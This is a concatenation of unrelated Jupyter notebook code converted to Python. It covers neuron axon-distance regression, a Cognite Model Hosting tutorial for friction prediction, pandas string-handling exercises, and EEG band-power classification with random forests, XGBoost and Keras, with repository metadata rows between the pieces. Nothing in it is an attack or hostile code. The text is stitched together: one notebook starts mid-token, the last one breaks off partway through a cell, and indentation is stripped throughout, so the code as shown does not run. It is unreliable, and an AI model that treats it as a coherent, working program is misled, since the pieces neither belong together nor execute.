cswc['region'] = get_node_regions(cswc)['region']
cswc = cswc[cswc.region.isin(tid)]
cswc = cswc[cswc.parent.isin(cswc.index)]
if len(cswc)>0:
cc, outlier_ratio = get_center(cswc, True)
cc = cswc.loc[cc]
cl = total_length(cswc)/1000
if cl < 1:
print('%s:\t%.2fmm' % (i, cl))
else:
nlist_selected.append(i)
axon_dict.update({i:cswc})
axon_df.loc[i, ['x', 'y', 'z', 'length']] = cc[['x', 'y', 'z']].tolist()+[cl]
print(len(nlist), len(nlist_selected))
# -
# ## distance soma v.s. axon
# %matplotlib inline
# +
iu = np.triu_indices(len(nlist_selected), k=1)
soma_dist = sklearn.metrics.pairwise_distances(soma_df.loc[nlist_selected, ['x', 'y', 'z']])[iu].reshape(-1,1)
axon_dist = sklearn.metrics.pairwise_distances(axon_df.loc[nlist_selected, ['x', 'y', 'z']])[iu].reshape(-1,1)
df = pd.DataFrame({'Soma_distance (mm)':soma_dist[:,0],
'Axon_distance (mm)':axon_dist[:,0],
})/1000
lm = sklearn.linear_model.LinearRegression()
lm.fit(soma_dist, axon_dist)
r2 = lm.score(soma_dist, axon_dist)
c1 = lm.coef_
c2 = lm.intercept_
r = np.corrcoef(soma_dist[:,0], axon_dist[:,0])[0,1]
fig, ax = plt.subplots(1,1, figsize=(3,3))
ax.tick_params(length=4, width=1, color='k')
for axis in ['top','bottom','left','right']:
ax.spines[axis].set_linewidth(0.5)
g = sns.regplot("Soma_distance (mm)", "Axon_distance (mm)",
data=df,
x_bins=10,
order=1,
truncate=True,
ax=ax,
color='darkorange',
line_kws={'lw':0.5},
scatter_kws={'s':15},
x_jitter=.1)
xlim = ax.get_xlim()
xr = (xlim[1]-xlim[0])
ylim = ax.get_ylim()
yr = (ylim[1]-ylim[0])
txlim = xlim[0] + xr*0.05
ax.set_xlim((0,1.2))
ax.text(txlim, ylim[0] + yr*0.95, "R^2 = %.2f" % (r2), fontdict={'ha':'left', 'va':'top'})
ax.text(txlim, ylim[0] + yr*0.87, "R = %.2f" % (r), fontdict={'ha':'left', 'va':'top'})
ax.text(txlim, ylim[0] + yr*0.79, "y = %.2fx + %.2f" % (c1, c2), fontdict={'ha':'left', 'va':'top'})
fig.savefig("../Figure/soma_axon_regression_"+group+"_v2.pdf", bbox_inches='tight')
pickle.dump([df], open("Soma_axon_distance_"+group+"_v2.pickle", 'wb'))
# -
# ## Axon overlaps
# +
# Get subvolumn
region_id = nmt.bs.name_to_id(target)
tp = nmt.mergeROI([region_id], nmt.annotation.array)
tp[:,:,int(midline/25):] = 0
tp = np.where(tp==region_id)
xlim = (np.max([np.min(tp[0])*25.0 - 500, 0]),
np.min([np.max(tp[0])*25.0 + 500, x_max]))
ylim = (np.max([np.min(tp[1])*25.0 - 500, 0]),
np.min([np.max(tp[1])*25.0 + 500, y_max]))
zlim = (np.max([np.min(tp[2])*25.0 - 500, 0]),
np.min([np.max(tp[2])*25.0 + 500, z_max]))
print(xlim, ylim, zlim)
step_size = 75
x_steps = int((xlim[1]-xlim[0])/step_size)
y_steps = int((ylim[1]-ylim[0])/step_size)
z_steps = int((zlim[1]-zlim[0])/step_size)
print("x steps:\t%d\ny steps:\t%d\nz steps:\t%d" % (x_steps, y_steps, z_steps))
def density_estimation(cur_name, x_steps=20, y_steps=20, plot=True):
z = axon_dict[cur_name].swc.copy()
kde = sklearn.neighbors.KernelDensity(bandwidth=50)
kde.fit(z[['x', 'y']])
p = np.zeros((x_steps, y_steps))
xs = np.linspace(xlim[0], xlim[1], num=x_steps)
ys = np.linspace(ylim[0], ylim[1], num=y_steps)
for i in range(x_steps):
for j in range(y_steps):
p[i,j] = np.exp(kde.score(np.array([xs[i], ys[j]]).reshape(1,2)))
p = p
p = p / np.sum(p)
if plot:
fig, ax = plt.subplots(1,1, figsize=(7,7))
ax.imshow(p)
return p
def density_estimation_3d(cur_name, x_steps=20, y_steps=20, z_steps=20, plot=True):
z = axon_dict[cur_name].copy()
kde = sklearn.neighbors.KernelDensity(bandwidth=50)
kde.fit(z[['x', 'y', 'z']])
p = np.zeros((x_steps, y_steps, z_steps))
tp = np.where(p==0)
tp = np.hstack([tp[0].reshape(-1,1),
tp[1].reshape(-1,1),
tp[2].reshape(-1,1)
])*step_size+np.array([xlim[0], ylim[0], zlim[0]]).reshape(1,-1)
p = np.exp(kde.score_samples(tp)).reshape(x_steps, y_steps, z_steps, order="C"
| 8,191 |
/examples/model_hosting/notebook/training/LocalTraining.ipynb
|
75f1b0e18318691eb28555bee25add84ac7c9294
|
[
"Apache-2.0"
] |
permissive
|
tibnor/cognite-python-docs
|
https://github.com/tibnor/cognite-python-docs
| 0 | 0 |
Apache-2.0
| 2022-01-12T11:31:53 | 2019-04-01T11:48:17 | null |
Jupyter Notebook
| false | false |
.py
| 171,470 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Introduction
#
# In this tutorial we will show how to train a model locally and deploy it to Cognite Model Hosting.
#
# Imagine you have some equipment with temperature and pressure sensors. A key factor to achieving a long lifecycle for this type of equipment is to make sure the friction isn't too high. You can measure the friction, but it's expensive - so you would prefer to avoid it. The physics are known, so you know friction follows the formula `f = b0 + b1*t + b2*p * b3*sqrt(t*p)`. But you don't know the constants `b0, b1, b2, b3`. You decide to measure the friction for two days and then estimate the constants with linear regression. You'll train with data from the first day and validate with data from day two.
#
# **Requirements**:
# - You need to have `cognite-model-hosting-notebook`, `pandas`, `scikit-learn` and `matplotlib` installed
# - The environment variable `COGNITE_API_KEY` should be set
# # Training data
#
# You can use your own data or you can generate some fake data by running the `generate_data.py` script.
# The ids of the time series we will use for training
# NOTE: USE YOUR OWN TIME SERIES OR THOSE YOU GET FROM generate_data.py
ts_ids = {
'temperature': 1679922414096185,
'pressure': 3284093576623567,
'friction': 413574373177922,
}
# We'll define our training and validation data in a DataSpec.
# +
from cognite.model_hosting.data_spec import DataSpec, TimeSeriesSpec
from datetime import datetime
training_data_spec = DataSpec(time_series={
alias: TimeSeriesSpec(
id=ts_id,
start=datetime(2019, 3, 1),
end=datetime(2019, 3, 2),
aggregate="average",
granularity="1m",
)
for alias, ts_id in ts_ids.items()
})
validation_data_spec = DataSpec(time_series={
alias: TimeSeriesSpec(
id=ts_id,
start=datetime(2019, 3, 2),
end=datetime(2019, 3, 3),
aggregate="average",
granularity="1m",
)
for alias, ts_id in ts_ids.items()
})
# -
# And then we can use the DataFetcher to fetch the training data and have a look at it.
# +
from cognite.model_hosting.data_fetcher import DataFetcher
data_fetcher = DataFetcher(training_data_spec)
df = data_fetcher.time_series.fetch_dataframe(["temperature", "pressure", "friction"])
# %matplotlib inline
df.plot(x="timestamp")
# -
# # Defining the model
#
# Creating a model is quite easy. First we define our requirements. We're going to use `cognite-model-hosting` and `scikit-learn`.
# +
# # !requirements
# cognite-model-hosting==0.1.0
# scikit-learn==0.20.3
# -
# Then we write code. We need to define three functions: `train_model()`, `load_model()` and `predict()`.
# # !model
import pickle
import numpy as np
from sklearn.linear_model import LinearRegression
from cognite.model_hosting.data_fetcher import DataFetcher
def train_model(open_artifact, data_spec):
data_fetcher = DataFetcher(data_spec)
df = data_fetcher.time_series.fetch_dataframe(["temperature", "pressure", "friction"])
X = df[["temperature", "pressure"]].copy()
X["intercept"] = np.ones(len(X))
X["sqrt_temp_press"] = np.sqrt(X.temperature * X.pressure)
y = df["friction"]
regressor = LinearRegression()
regressor.fit(X, y)
with open_artifact("regressor.pkl", "wb") as f:
pickle.dump(regressor, f)
# +
# # !model
def load_model(open_artifact):
with open_artifact("regressor.pkl", "rb") as f:
return pickle.load(f)
def predict(model, instance):
regressor = model
data_fetcher = DataFetcher(instance)
df = data_fetcher.time_series.fetch_dataframe(["temperature", "pressure"])
X = df[["temperature", "pressure"]]
X["intercept"] = np.ones(len(X))
X["sqrt_temp_press"] = np.sqrt(X.temperature * X.pressure)
predicted_friction = regressor.predict(X)
return list(predicted_friction)
# -
# We simply mark every cell we want included in the model with `# !model`. We don't include the `train_model()` function since we'll do training locally in this tutorial.
#
# Our `train_model()` function must have `open_artifact` as it's first parameter. The second parameter is user-defined. `open_artifact` is just like the builtin function `open()`. It can be used to read and write files. But `open_artifact()` points to a storage location specific for the artifacts of a single model version. When you train locally this will just be a folder on your machine, while when you train in Model Hosting this will be a special cloud storage location.
#
# The purpose of `load_model()` is to load our model from the artifact storage - from where it was written in `train_model`. It's first parameter must be `open_artifact`.
#
# The `predict()` method must take `model` as the first parameter and `instance` as second. The `model` parameter is whatever `load_model` returns and can be an arbitrary Python value, but is in this case an instance of LinearRegression (our trained regressor). `instance` is the value to do prediction on. We have here assumed the user will pass in a data spec as instance, but it can be whatever you want as long as it's JSON serializable.
#
# Okay, let's train our model locally.
# +
from cognite.model_hosting.notebook import local_artifacts
train_model(local_artifacts("tutorial-friction"), training_data_spec)
# -
# That's it! `local_artifacts()` creates a version of `open_artifact` that points the folder `artifacts/<name>/`. So you will find the artifacts created during training in the folder `artifacts/tutorial-friction/` - check it out!
# # Testing locally
#
# Before we deploy this to Model Hosting we can try out prediction locally on our validation data.
model = load_model(local_artifacts("tutorial-friction"))
predictions = predict(model, validation_data_spec)
# +
data_fetcher = DataFetcher(validation_data_spec)
df = data_fetcher.time_series.fetch_dataframe(["temperature", "pressure", "friction"])
df["predicted_friction"] = predictions
# %matplotlib inline
df.plot(x="timestamp")
# -
# Looks good (almost perfect actually - that's because we use fake data in this tutorial).
# If this was a real use case we would probably do more than just plot the predictions, but we will leave it at that and turn our focus on how to deploy.
# # Deploy our model
# +
from cognite.client import CogniteClient
from cognite.model_hosting.notebook import deploy_model_version
model_hosting = CogniteClient().experimental.model_hosting
# -
# Before we can deploy a model version we must have a model.
model_id = model_hosting.models.create_model("tutorial-friction").id
# And then we deploy this notebook and our trained model as a model version. It's important you **save the notebook** before doing this since the notebook file will be read to find your model. Note that we specify the folder we saved artifacts to during training. All artifacts/files in this folder are uploaded.
model_version_id = deploy_model_version(
name="tutorial-friction-v1",
model_id=model_id,
runtime_version="0.1",
artifacts_directory="artifacts/tutorial-friction",
)
# Now we just have to wait for the deployment to finish. This usually takes a few minutes. Notice that the next step won't work before the status of the model version is 'READY'.
model_hosting.models.get_model_version(model_id, model_version_id).status
# # Testing the model
#
# Now that it's deployed we can test it out. Let's perform the same prediction as we did locally - on the validation data.
predictions = model_hosting.models.online_predict(model_id, model_version_id, instances=[validation_data_spec])[0]
# +
data_fetcher = DataFetcher(validation_data_spec)
df = data_fetcher.time_series.fetch_dataframe(["temperature", "pressure", "friction"])
df["predicted_friction"] = predictions
# %matplotlib inline
df.plot(x="timestamp")
# -
# Same result as we got locally! It's important to note that these predictions were performed in Cognite Model Hosting in the cloud, not on your computer. Anyone with internet (and appropriate access rights) can now access this model!
# When you're done - remember to clean up after yourself:
source_package_id = model_hosting.models.get_model_version(model_id, model_version_id).source_package_id
model_hosting.models.delete_model(model_id)
model_hosting.source_packages.delete_source_package(source_package_id)
| 8,615 |
/Example/.ipynb_checkpoints/Global_Variable_initialzer Example Code-checkpoint.ipynb
|
a28d37b747569a00e2fbc92f1585a73cb1c28a5c
|
[] |
no_license
|
b8goal/TensorFlow
|
https://github.com/b8goal/TensorFlow
| 1 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 10,500 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ---
#
# _You are currently looking at **version 1.0** of this notebook. To download notebooks and datafiles, as well as get help on Jupyter notebooks in the Coursera platform, visit the [Jupyter Notebook FAQ](https://www.coursera.org/learn/python-text-mining/resources/d9pwm) course resource._
#
# ---
# # Working with Text Data in pandas
# +
import pandas as pd
time_sentences = ["Monday: The doctor's appointment is at 2:45pm.",
"Tuesday: The dentist's appointment is at 11:30 am.",
"Wednesday: At 7:00pm, there is a basketball game!",
"Thursday: Be back home by 11:15 pm at the latest.",
"Friday: Take the train at 08:10 am, arrive at 09:00am."]
df = pd.DataFrame(time_sentences, columns=['text'])
df
# -
# find the number of characters for each string in df['text']
df['text'].str.len()
# find the number of tokens for each string in df['text']
df['text'].str.split().str.len()
# find which entries contain the word 'appointment'
df['text'].str.contains('appointment')
# find how many times a digit occurs in each string
df['text'].str.count(r'\d')
# find all occurances of the digits
df['text'].str.findall(r'\d')
# group and find the hours and minutes
df['text'].str.findall(r'(\d?\d):(\d\d)')
# replace weekdays with '???'
df['text'].str.replace(r'\w+day\b', '???')
# replace weekdays with 3 letter abbrevations
df['text'].str.replace(r'(\w+day\b)', lambda x: x.groups()[0][:3])
# create new columns from first match of extracted groups
df['text'].str.extract(r'(\d?\d):(\d\d)')
# extract the entire time, the hours, the minutes, and the period
df['text'].str.extractall(r'((\d?\d):(\d\d) ?([ap]m))')
# extract the entire time, the hours, the minutes, and the period with group names
df['text'].str.extractall(r'(?P<time>(?P<hour>\d?\d):(?P<minute>\d\d) ?(?P<period>[ap]m))')
phaLow.mean(),
forward.betaHigh.mean(), forward.betaLow.mean(), forward.alphaHigh.mean(),
forward.gammaLow.mean(), forward.gammaMid.mean()]
r = [rest.delta.mean(), rest.theta.mean(), rest.alphaLow.mean(),
rest.betaHigh.mean(), rest.betaLow.mean(), rest.alphaHigh.mean(),
rest.gammaLow.mean(), rest.gammaMid.mean()]
index = ['delta', 'theta', 'alphaLow','alphaHigh', 'betaLow', 'betaHigh', 'gammaLow', 'gammaMid']
df = pd.DataFrame({'back': u, 'forward': d, 'rest': r}, index=index)
ax = df.plot.bar(rot=0, figsize=(20,10))
# +
# create an array of shape 30706, 9 = number of records by the features
data = np.array([[0 for x in range(8)] for y in range(len(dataDF))])
for i in range(len(dataDF)):
data[i] = [dataDF.delta.values[i],
dataDF.theta.values[i],
dataDF.alphaLow.values[i],
dataDF.alphaHigh.values[i],
dataDF.betaLow.values[i],
dataDF.betaHigh.values[i],
dataDF.gammaLow.values[i],
dataDF.gammaMid.values[i]]
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelBinarizer, LabelEncoder
encoder = LabelBinarizer()
encoder = LabelEncoder()
labels = encoder.fit_transform(dataDF.action.values)
# creating training and test sets
x_train, x_test, y_train, y_test = train_test_split(data, labels)
print(x_train.max())
print(x_train.min())
from sklearn.preprocessing import MinMaxScaler, StandardScaler
scaler = MinMaxScaler()
stan_scaler = StandardScaler()
x_train = stan_scaler.fit_transform(x_train)
x_test = stan_scaler.transform(x_test)
all_labels = dataDF.action.values
all_data = dataDF.drop(['action'], axis=1)
# -
# +
from sklearn import model_selection
from sklearn.ensemble import RandomForestClassifier
from sklearn import metrics
from sklearn.model_selection import cross_val_score
# XGBoost
from sklearn import metrics
from sklearn.model_selection import cross_val_score
from xgboost import XGBClassifier
from numpy import sort
from sklearn.metrics import accuracy_score
from sklearn.feature_selection import SelectFromModel
# Random Forrest
rfc = RandomForestClassifier()
rfc.fit(x_train, y_train)
print(rfc.feature_importances_)
print("The score for Random Forest ", rfc.score(x_test, y_test))
y_pred = rfc.predict(x_test)
#Import scikit-learn metrics module for accuracy calculation
# Model Accuracy, how often is the classifier correct?
print(len(y_train))
print("Accuracy for x_test:", metrics.accuracy_score(y_test, y_pred))
scores = cross_val_score(rfc, all_data, labels, cv=10, scoring='accuracy')
print("Cross Validation Accuracy: %0.2f (+/- %0.2f)" % (scores.mean(), scores.std() * 2))
print(scores)
# Fit model using each importance as a threshold
thresholds = sort(rfc.feature_importances_)
for thresh in thresholds:
# select features using threshold
selection = SelectFromModel(rfc, threshold=thresh, prefit=True)
select_X_train = selection.transform(x_train)
# train model
selection_model = RandomForestClassifier()
selection_model.fit(select_X_train, y_train)
# eval model
select_X_test = selection.transform(x_test)
y_pred = selection_model.predict(select_X_test)
predictions = [round(value) for value in y_pred]
accuracy = accuracy_score(y_test, predictions)
print("Thresh=%.3f, n=%d, Accuracy: %.2f%%" % (thresh, select_X_train.shape[1], accuracy*100.0))
# -
from sklearn import tree
from subprocess import call
# Display in jupyter notebook
from IPython.display import Image
i_tree = 0
for tree_in_forest in rfc.estimators_:
with open('tree_' + str(i_tree) + '.dot', 'w') as my_file:
my_file = tree.export_graphviz(tree_in_forest, out_file = my_file)
i_tree = i_tree + 1
i_tree = 0
for tree_in_forest in rfc.estimators_:
call(['dot', '-Tpng', 'tree_' + str(i_tree) + '.dot', '-o', 'tree_' + str(i_tree) + '.png', '-Gdpi=600'])
Image(filename = 'tree_' + str(i_tree) + '.png')
i_tree = i_tree + 1
# +
# XGBoost
from sklearn import metrics
from sklearn.model_selection import cross_val_score
from xgboost import XGBClassifier
from xgboost import plot_importance
from matplotlib import pyplot
from xgboost import plot_tree
xgb = XGBClassifier()
xgb.fit(x_train, y_train)
# plot feature importance
plot_importance(xgb)
pyplot.show()
print(xgb)
print("The score for XGBoost ", xgb.score(x_test, y_test))
y_pred = xgb.predict(x_test)
print("Accuracy for x_test:", metrics.accuracy_score(y_test, y_pred))
predictions = [round(value) for value in y_pred]
# evaluate predictions
accuracy = metrics.accuracy_score(y_test, predictions)
print("Accuracy: %.2f%%" % (accuracy * 100.0))
scores = cross_val_score(xgb, all_data, labels, cv=10, scoring='accuracy')
print("Cross Validation Accuracy: %0.2f (+/- %0.2f)" % (scores.mean(), scores.std() * 2))
print(scores)
plot_tree(xgb)
plt.show()
# Fit model using each importance as a threshold
thresholds = sort(xgb.feature_importances_)
for thresh in thresholds:
# select features using threshold
selection = SelectFromModel(xgb, threshold=thresh, prefit=True)
select_X_train = selection.transform(x_train)
# train model
selection_model = XGBClassifier()
selection_model.fit(select_X_train, y_train)
# eval model
select_X_test = selection.transform(x_test)
y_pred = selection_model.predict(select_X_test)
predictions = [round(value) for value in y_pred]
accuracy = accuracy_score(y_test, predictions)
print("Thresh=%.3f, n=%d, Accuracy: %.2f%%" % (thresh, select_X_train.shape[1], accuracy*100.0))
# +
fig, ax = plt.subplots(figsize=(30, 30))
plot_tree(xgb, num_trees=4, ax=ax)
plt.show()
# -
def plot_confusion_matrix(cm, classes,
normalize=False,
title='confusion matrix',
cmap=plt.cm.Blues):
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(classes))
plt.xticks(tick_marks, classes, rotation=45)
plt.yticks(tick_marks, classes)
if normalize:
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
print("noralized confusion matrix")
else:
print('confusion matrix without normalization')
print(cm)
thresh = cm.max() / 2.
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
plt.text(j, i, cm[i, j],
horizontalalignment='center',
color='white' if cm[i, j] > thresh else 'black')
plt.tight_layout()
plt.ylabel('True label')
plt.xlabel('predicted label')
from sklearn.metrics import confusion_matrix
import itertools
matrix = confusion_matrix(y_test, y_pred)
my_labels = ['back', 'forward', 'rest']
plot_confusion_matrix(matrix, my_labels, title='Conf Matr')
eval_set = [(x_train, y_train), (x_test, y_test)]
eval_metric = ["auc","error"]
# # Model Tuning and feature importance XGBoost
# +
# XGBoost
from sklearn import metrics
from sklearn.model_selection import cross_val_score
from xgboost import XGBClassifier
from numpy import sort
from sklearn.metrics import accuracy_score
from sklearn.feature_selection import SelectFromModel
xgb = XGBClassifier(silent=True,
scale_pos_weight=1,
learning_rate=0.01,
colsample_bytree = 1,
subsample = 1,
objective='multi:softprob',
n_estimators=1000,
reg_alpha = 0.3,
max_depth=5,
gamma=2)
xgb.fit(x_train, y_train)
# plot feature importance
plot_importance(xgb)
pyplot.show()
# print(xgb)
print("The score for XGBoost ", xgb.score(x_test, y_test))
y_pred = xgb.predict(x_test)
print("Accuracy for x_test:", metrics.accuracy_score(y_test, y_pred))
predictions = [round(value) for value in y_pred]
# evaluate predictions
accuracy = metrics.accuracy_score(y_test, predictions)
print("Accuracy: %.2f%%" % (accuracy * 100.0))
scores = cross_val_score(xgb, all_data, labels, cv=10, scoring='accuracy')
print("Cross Validation Accuracy: %0.2f (+/- %0.2f)" % (scores.mean(), scores.std() * 2))
print(scores)
# Fit model using each importance as a threshold
thresholds = sort(xgb.feature_importances_)
for thresh in thresholds:
# select features using threshold
selection = SelectFromModel(xgb, threshold=thresh, prefit=True)
select_X_train = selection.transform(x_train)
# train model
selection_model = XGBClassifier(silent=True,
scale_pos_weight=1,
learning_rate=0.01,
colsample_bytree = 1,
subsample = 1,
objective='multi:softprob',
n_estimators=1000,
reg_alpha = 0.3,
max_depth=5,
gamma=2)
selection_model.fit(select_X_train, y_train)
# eval model
select_X_test = selection.transform(x_test)
y_pred = selection_model.predict(select_X_test)
predictions = [round(value) for value in y_pred]
accuracy = accuracy_score(y_test, predictions)
print("Thresh=%.3f, n=%d, Accuracy: %.2f%%" % (thresh, select_X_train.shape[1], accuracy*100.0))
# -
# import xgboost as xgb
# dtrain = xgb.DMatrix(data, label=labels)
# param = {'max_depth': 5, 'eta': 1, 'silent': 1, 'objective': 'multi:softprob'}
# bst = xgb.train(param, dtrain, 10)
# bst.dump_model(xgb, './out/xgb_76.txt', with_stats=True)
from sklearn.externals import joblib
#save model
joblib.dump(xgb, './out/xgb_77.dat')
# +
min_max_scaler = preprocessing.MinMaxScaler()
x_train = min_max_scaler.fit_transform(x_train)
x_test = min_max_scaler.transform(x_test)
from keras.utils import np_utils
# convert integers to dummy variables (i.e. one hot encoded)
y_train = np_utils.to_categorical(y_train)
y_test = np_utils.to_categorical(y_test)
# -
encoder.inverse_transform([argmax(y_test[2], axis=0)])
encoder.inverse_transform(y_train)
y_test[2]
x_test[1]
y_test[0]
x_test[1]
# +
a = [[852567, 133691, 16747769, 19974, 16748623, 14364, 4845, 34877]]
# a = min_max_scaler.transform(a)
a_std = (a[0][0] - 16777208) / (1 - 0)
a_scaled = a_std * (16777208 - 92) + 0
a[0][0] = a[0][0] / a_scaled
a[0][0]
# -
a = [[852567, 133691, 16747769, 19974, 16748623, 14364, 4845, 34877]]
a = min_max_scaler.transform(a)
a[0]
# +
data = [[50, 1800, 3,4,5,6,7,7]]
dj = min_max_scaler.transform(data)
print(min_max_scaler.data_max_)
print(dj)
# +
data = [[34, 1800]]
dataStd = (1800 - 92) / (16777208 - 92)
data_scaled = dataStd * (1 - 0) + 0
data_scaled
# +
data = [[34, 1800]]
dataStd = (34 - 92) / (16777208 - 92)
data_scaled = dataStd * (1 - 0) + 0
data_scaled
# +
data = [[34, 1800]]
dataStd = (50 - 92) / (16777208 - 92)
data_scaled = dataStd * (1 - 0) + 0
data_scaled
# -
x_train.shape()
# +
from keras import models
from keras import layers
# from keras import regularizers kernel_regularizer=regularizers.l2(0.01),
from keras.optimizers import Adam
m = models.Sequential()
m.add(layers.Dense(16, input_shape=(8,)))
m.add(layers.Dense(32, activation="relu"))
m.add(layers.Dense(64, activation="relu"))
m.add(layers.Dense(16, activation="softmax"))
m.add(layers.Dense(3, activation='softmax'))
# Adam = Adam(lr=0.05)
m.compile(optimizer=Adam(lr=0.00038),
loss='categorical_crossentropy',
metrics=['acc'])
m.summary()
# +
from keras.utils import plot_model
plot_model(m, to_file='model.png')
from IPython.display import SVG
from keras.utils.vis_utils import model_to_dot
SVG(model_to_dot(m).create(prog='dot', format='svg'))
# +
from keras import models
from keras import layers
# from keras import regularizers kernel_regularizer=regularizers.l2(0.01),
from keras.optimizers import Adam
network = models.Sequential()
network.add(layers.Dense(16, input_shape=(8,)))
network.add(layers.Dense(32, activation="relu"))
network.add(layers.Dense(64, activation="relu"))
network.add(layers.Dense(16, activation="softmax"))
network.add(layers.Dense(3, activation='softmax'))
# Adam = Adam(lr=0.05)
network.compile(optimizer=Adam(lr=0.00038),
loss='categorical_crossentropy',
metrics=['acc'])
network.summary()
history = network.fit(x_train, y_train,
epochs=100, verbose=1, batch_size=2)
loss_and_metrics = network.evaluate(x_test, y_test)
print('loss and metrics', loss_and_metrics)
# %matplotlib inline
import matplotlib.pyplot as plt
# Plot training & validation accuracy values
plt.plot(history.history['acc'])
plt.title('Model accuracy')
plt.ylabel('Accuracy')
plt.xlabel('Epoch')
plt.legend(['Train', 'Test'], loc='upper left')
plt.show()
# Plot training & validation loss values
plt.plot(history.history['loss'])
plt.title('Model loss')
plt.ylabel('Loss')
plt.xlabel('Epoch')
plt.legend(['Train', 'Test'], loc='upper left')
plt.show()
# +
def keras_to_tensorflow(keras_model, output_dir, model_name,out_prefix="output_", log_tensorboard=True):
if os.path.exists(output_dir) == False:
os.mkdir(output_dir)
out_nodes = []
for i in range(len(keras_model.outputs)):
out_nodes.append(out_prefix + str(i + 1))
tf.identity(keras_model.output[i], out_prefix + str(i + 1))
sess = K.get_session()
from tensorflow.python.framework import graph_util, graph_io
init_graph = sess.graph.as_graph_def()
main_graph = graph_util.convert_variables_to_constants(sess, init_graph, out_nodes)
graph_io.write_graph(main_graph, output_dir, name=model_name, as_text=False)
if log_tensorboard:
from tensorflow.python.tools import import_pb_to_tensorboard
import_pb_to_tensorboard.import_to_tensorboard(
os.path.join(output_dir, model_name),
output_dir)
keras_to_tensorflow(network, './out', 'cat_dog.pb')
# +
def freeze_session(session, keep_var_names=None, output_names=None, clear_devices=True):
"""
Freezes the state of a session into a pruned computation graph.
Creates a new computation graph where variable nodes are replaced by
constants taking their current value in the session. The new graph will be
pruned so subgraphs that are not necessary to compute the requested
outputs are removed.
@param session The TensorFlow session to be frozen.
@param keep_var_names A list of variable names that should not be frozen,
or None to freeze all the variables in the graph.
@param output_names Names of the relevant graph outputs.
@param clear_devices Remove the device directives from the graph for better portability.
@return The frozen graph definition.
"""
from tensorflow.python.framework.graph_util import convert_variables_to_constants
graph = session.graph
with graph.as_default():
freeze_var_names = list(set(v.op.name for v in tf.global_variables()).difference(keep_var_names or []))
output_names = output_names or []
output_names += [v.op.name for v in tf.global_variables()]
input_graph_def = graph.as_graph_def()
if clear_devices:
for node in input_graph_def.node:
node.device = ""
frozen_graph = convert_variables_to_constants(session, input_graph_def,
output_names, freeze_var_names)
return frozen_graph
from keras import backend as K
# Create, compile and train model...
frozen_graph = freeze_session(K.get_session(),
output_names=[out.op.name for out in network.outputs])
tf.train.write_graph(frozen_graph, "./out/", "my_model.pb", as_text=False)
# -
# # Export model
# +
# This was created with @warptime's help. Thank you!
from tensorflow.python.framework import graph_util
from tensorflow.python.framework import graph_io
from keras.models import load_model
from keras import backend as K
import os.path as osp
model = load_model('out/8_wave_input_67pc.h5')
nb_classes = 3 # The number of output nodes in the model
prefix_output_node_names_of_final_network = 'output_node'
K.set_learning_phase(0)
pred = [None]*nb_classes
pred_node_names = [None]*nb_classes
for i in range(nb_classes):
pred_node_names[i] = prefix_output_node_names_of_final_network+str(i)
pred[i] = tf.identity(model.output[i], name=pred_node_names[i])
print('output nodes names are: ', pred_node_names)
sess = K.get_session()
output_fld = './tensorflow_model/'
if not os.path.isdir(output_fld):
os.mkdir(output_fld)
output_graph_name = 'model' + '.pb'
output_graph_suffix = '_inference'
constant_graph = graph_util.convert_variables_to_constants(sess, sess.graph.as_graph_def(), pred_node_names)
graph_io.write_graph(constant_graph, output_fld, output_graph_name, as_text=False)
print('saved the constant graph (ready for inference) at: ', osp.join(output_fld, output_graph_name))
# -
# # Check the frozen nodes
# +
g = tf.GraphDef()
g.ParseFromString(open('./out/my_model.pb', 'rb').read())
[n for n in g.node if n.name.find('output') != -1]
# -
ops = set([n.op for n in g.node])
print(" ".join(ops))
# +
def print_graph_nodes(filename):
import tensorflow as tf
g = tf.GraphDef()
g.ParseFromString(open(filename, 'rb').read())
print()
print(filename)
print("=======================INPUT=========================")
print([n for n in g.node if n.name.find('input') != -1])
print("=======================OUTPUT========================")
print([n for n in g.node if n.name.find('output') != -1])
print("===================KERAS_LEARNING=====================")
print([n for n in g.node if n.name.find('keras_learning_phase') != -1])
print("======================================================")
print()
print_graph_nodes('./out/cat_dog.pb')
# +
# create an array of shape 30706, 9 = number of records by the features
all_data = np.array([[0 for x in range(8)] for y in range(len(dataDF))])
for i in range(len(dataDF)):
all_data[i] = [dataDF.delta.values[i],
dataDF.theta.values[i],
dataDF.alphaLow.values[i],
dataDF.alphaHigh.values[i],
dataDF.betaLow.values[i],
dataDF.betaHigh.values[i],
dataDF.gammaLow.values[i],
dataDF.gammaMid.values[i]]
from sklearn.preprocessing import MinMaxScaler, StandardScaler
scaler = MinMaxScaler()
all_data = scaler.fit_transform(all_data)
# estimator = KerasClassifier(build_fn=network, epochs=50, batch_size=5, verbose=0)
# kfold = KFold(n_splits=10, shuffle=True, random_state=seed)
# results = cross_val_score(estimator, all_data, labels, cv=kfold)
# print("Baseline: %.2f%% (%.2f%%)" % (results.mean()*100, results.std()*100))
# +
from keras.applications.vgg16 import preprocess_input
from sklearn.model_selection import StratifiedKFold
skf = StratifiedKFold(n_splits=5, random_state=12)
avg_loss = []
avg_acc = []
# Loop through the indices the split() method returns
for index, (train_index, test_index) in enumerate(skf.split(all_data, labels)):
print("Training on fold " + str(index + 1) + "/5.............................................")
# Generate batches from indices
x_train, x_test = all_data[train_index], all_data[test_index]
# use one-hot vectors as labels
y_train, y_test = labels[train_index], labels[test_index]
y_train = np_utils.to_categorical(y_train)
y_test = np_utils.to_categorical(y_test)
# network = models.Sequential()
# network.add(layers.Dense(16, input_shape=(8,)))
# network.add(layers.Dense(32, activation="relu"))
# network.add(layers.Dense(64, activation="relu"))
# network.add(layers.Dense(32, activation="relu"))
# network.add(layers.Dense(16, activation="sigmoid"))
# network.add(layers.Dense(1, activation='sigmoid'))
# # Adam = Adam(lr=0.05)
# network.compile(optimizer=Adam(lr=0.00038),
# loss='binary_crossentropy',
# metrics=['acc'])
# network.summary()
